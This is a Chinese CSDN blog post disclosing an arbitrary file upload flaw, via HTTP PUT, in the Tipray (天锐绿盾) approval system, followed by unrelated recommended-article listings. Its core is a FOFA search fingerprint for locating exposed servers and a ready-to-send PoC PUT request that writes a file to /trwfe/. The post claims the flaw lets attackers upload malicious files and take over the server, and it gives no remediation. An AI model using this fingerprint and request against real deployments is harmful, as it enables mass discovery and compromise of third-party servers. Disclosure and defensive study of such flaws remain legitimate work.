天锐绿盾审批系统存在PUT文件上传漏洞

最新推荐文章于 2024-10-17 09:40:47 发布
最新推荐文章于 2024-10-17 09:40:47 发布
阅读量229 收藏
点赞数 3
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/142324020
版权

漏洞描述

天锐绿盾审批系统的支持PUT请求方式,导致攻击者可上传任意恶意文件,获取服务器权限。

FOFA:

body="location.href=location.href+\"trwfe\";"

 漏洞复现

POC:

PUT /trwfe/1.txt HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Pragma: no-cache
Upgrade-Insecure-Requests: 1

123456

上传成功

摸金校尉-马
关注
天锐绿盾解密_天锐绿盾数据防泄密系统
weixin_39951295的博客
12-05 3490
天锐绿盾数据防泄密系统(简称数据防泄密系统)是一套从源头上保障数据安全和使用安全的软件系统。包含了文件透明加解密、内部文件流转、密级管控、离线管理、文件外发管理、灵活的审批流程、工作模式切换、服务器白名单等功能,并全面覆盖Mac、Windows、Linux系统。从根本上严防信息外泄,保障信息安全。天锐绿盾数据防泄密系统(简称数据防泄密系统)是一套从源头上保障数据安全和使用安全的软件系统。包含了文件...
天锐绿盾避免微信传输文件泄密的一二三四
jiaminetcn的博客
06-16 1305
微信处理涉密资料,数据违规外传泄密频发 近日浙江省通报了多起公职人员,因为使用微信处理涉密信息,而被开除或者警告处分的惨痛事件。天锐绿盾提醒大家对于违反保密法律法规的事件,很多时候并不是有意而为,也有可能是无意而为,但是不管是有意还是无意,导致信息泄密事件的事情确实是发生了。 作为国产信息安全行业的领头企业,天锐绿盾jiami.net.cn长期以来从事企事业单位信息安全整体解决方案服务,在服务过程中我们发现导致微信泄密产生的途径主要有以下几种。 第一、接受到需要保密的文件,但是呢,直接通过微信或者QQ聊天软
天锐绿盾 | -公司电脑文件防泄密软件
m0_74448820的博客
06-18 942
天锐绿盾,又名绿盾信息安全管理软件,是一款企业内网安全管理软件。它通过文件加密、内网管理、外网控制、U盘认证和打印控制等多种模块,有效地结合了局域网内文件的透明加密和内网的有效管理,满足了不同类型企业用户对信息安全的需求。——下载试用。
天锐绿盾 | 企业办公终端电脑文件资料透明加密系统
m0_74448820的博客
06-11 1071
天锐绿盾文档透明加密软件是一种专为保护企业敏感信息设计的解决方案,通过透明加密技术确保文件在存储和传输过程中的安全,防止数据泄漏。
如何设置天锐绿盾的数据防泄密系统
m0_74448820的博客
06-17 459
通过以上设置步骤,可以全面地配置天锐绿盾数据防泄密系统,从而有效地保护企业的数据安全,防止数据泄露和非法访问。一、系统安装与初始化。
天锐绿盾加密系统 | 文件外发防泄密 | 企业文件安全 | 文件加密系统
tipray的博客
06-24 322
而由于电子文档的容易散播性,导致发给客户或合作伙伴的重要资料,都可能被以明文的形式进行非法篡改、无序传播等,这使得企事业单位所做的大量工作付之一炬,严重危害了自身的利益。外发文档可根据重要性不同,以及客户或合作伙伴阅读对象的不同,设置外发文档不同的认证方式,如:口令、机器码、PC绑定、联网证书等。外发人员在已安装天锐绿盾外发管理软件的电脑上,插上已授权的USBKEY进行合法身份认证后,才可制作外发文档。当外发文件发给客户之后,如果客户有做修改,可以把修改之后的外发文件回收,回收之后的文件为原来的文件格式。
天锐绿盾技术大讲堂:解密审批流程管理
jiaminetcn的博客
07-01 1510
天锐绿盾终端安全管理系统,在业内大家又称为 绿盾加密软件。是一款成熟的企业信息化放泄密解决方案产品。再为企业提供良好的信息安全保护作用的同时,那么如何进行有效的信息安全交互,也是使用加密软件的企业所关注的一个重点。毕竟加密软件不单单只是把文件进行加密,但还需要与公司以外的人员进行文件的传输交互,那么这个时候就涉及到文件的解密。今天我们主要来讲一讲天锐绿盾加密软件的解密审批流程管理问题。第一,审批流程的设置天锐绿盾审批流程可以根据企事业单位的实际审批需求,建立一个或者多个的审批流程,不同的审批流程会用不同的人
天锐绿盾加密软件支持什么操作系统
qwswuzk的专栏
10-10 394
目前政府单位逐步在替换单位内的x86电脑,逐步把主机、芯片、软件等等都国产化,所以加密软件想要做政府单位的项目,必须全面支持国产化,并进行适配。
天锐绿盾-试用安装包:V7.01.2311.SC公司电脑核心文档、图纸、源代码、音视频自动智能无感透明加密防泄密管理系统
03-01
天锐绿盾终端覆盖Windows、Mac OS、Linux、UOS、Kylin等PC操作系统,提供IOS、Android、Harmony OS移动端APP,可实时审批,实现跨平台管理。 支持申请解密、批量解密、解密key、U盘终端等多种数据解密方式,支持...
天锐绿盾-自动智能透明加密 \ 防泄密软件-下载客户端安装包(试用测试版本-Windows)V7.00
08-25
一套利用驱动层透明加密技术实现电子文件安全加密的防护产品,从源头上保障数据安全和使用安全的加密系统。该系统遵循基于文件生命周期安全防护的思想,集成了密码学、访问控制和审计跟踪等技术手段,对企事业单位...
天锐绿盾加密 V5.53.181130
06-15
另一个文件"天锐绿盾使用说明文档.zip"则包含了详细的使用指南,包括系统设置、用户管理、策略配置等内容,对于新用户来说是一份非常实用的参考资料。 3. **应用场景** - **企业内部协作**:在企业内部,通过...
天锐绿盾V6.00.200513.SC.zip
08-21
在实际应用中,天锐绿盾通常会配合企业的安全策略,与防火墙、入侵检测系统等其他安全工具共同构建一个立体的防护体系。同时,其良好的兼容性和易用性也使得它能够无缝集成到各种企业IT环境中。 总的来说,天锐绿盾...
前端 js 处理一个数组 展示成层级下拉样式
最新发布
lzfengquan的博客
10-17 188
前端开发中,不管是什么时候都会遇到select 下拉框的使用,一般情况下,数据处理后端都会处理好。前端一般使用相应技术栈所推荐的公共组件就可以了。前端处理的前提是要确定那个是父级元素,那个是子级元素,这样才能更好的处理数据。这个时候前端要写个方法去处理这个数组了。这个数组后端是会给的。
004-按照指定功能模块名称分组
xiaogang1226的博客
10-16 406
需要把一个功能模块的几个功能点放在同一个文档目录下,这几个功能点分布在不同的 Controller。需要把他们单独分组,方便前端对接。在@ApiOperation 里面增加属性 tags 赋值。
前端地图数据开发
shuxiaoxii的博客
10-13 369
基于Turf.js教你快速实现地理围栏的合并拆分。turf js 地理空间分析库,处理各种地图算法。如何拆分一个乡镇或区的地图。获取市级的行政区域划分。直接导入地图的json。高德地图查看市级区域。js实现地图区域合并。
Vue3动态组件component不生效问题解决方法
Java_fenxiang的博客
10-14 837
问题:vue3循环渲染动态组件component不生效,页面空白在vue3使用component动态组件展示组件时,组件就是不展示显示空白。在vue2中使用动态变量component展示组件都是没问题。试了很多方法 踩了很多坑,所以记录下:登录后复制 <div class="preview-list" id="c...
Element-plus el-form、el-dialog 数据回显同时用时,重置失效问题
Mr. Zhang Xiaojian's Blog
10-12 597
当第一次打开网页并点击“编辑”按钮时,虽然对话框变量变为 true 使对话框可见,但同步代码会将 formData 对象的属性设置为默认值。由于 Vue 的异步更新机制,DOM 实际上还未更新,因此表单组件内绑定了这些有值的初始数据。这样,在后续调用 resetFields 方法时,表单将会重置为这些默认值而不是空值。编辑时表单的初始值被设置成了回显的数据,而不是空字符串。时,表单会回到上次设置的初始值,即回显的数据。
基于monaco-editor的web日志组件
暗影刀客的博客
10-12 357
一个基于monaco-editor的web日志组件,支持灵活的扩展配置,支持vue和react
天锐绿盾信息安全管理平台安装与配置指南
天锐绿盾信息安全管理平台是一款统一的信息安全管理平台,旨在提供一个集中化的管理入口,方便管理员同时管理多个系统。该平台采用了统一的安装包,可以同时安装多个系统,实现了在同一个平台中管控多个系统。 安装...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值